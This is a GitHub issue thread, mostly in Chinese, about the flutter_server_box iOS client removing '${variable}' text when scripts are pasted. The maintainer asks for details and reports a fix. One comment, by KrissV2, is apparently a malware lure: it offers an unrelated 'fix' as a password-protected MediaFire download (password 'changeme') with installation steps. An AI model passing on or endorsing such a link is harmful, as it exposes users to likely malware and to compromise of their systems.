### ISSUE TITLE
ios客户端脚本中含"${变量}"粘贴时候自动被移除

### ISSUE THREAD

**Issue by alias38** [lollipopkit/flutter_server_box#566]
${变量}这一段，在粘贴时自动被移除

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lollipopkit** [comment]
没太懂，是这个吗？
未能复现

https://github.com/user-attachments/assets/fe2b4778-11e6-400d-9ef6-f9d221e8476c

**Comment by alias38** [comment]
是的，不过不是系统变量，自定义的

**Comment by alias38** [comment]
https://github.com/user-attachments/assets/995e34dd-f395-4f21-9a71-b5c316afd554
这是效果
粘贴后${k}没有了

**Comment by lollipopkit** [comment]
已修复，请等待发布更新，如果仍存在问题，请再次开启 Issue
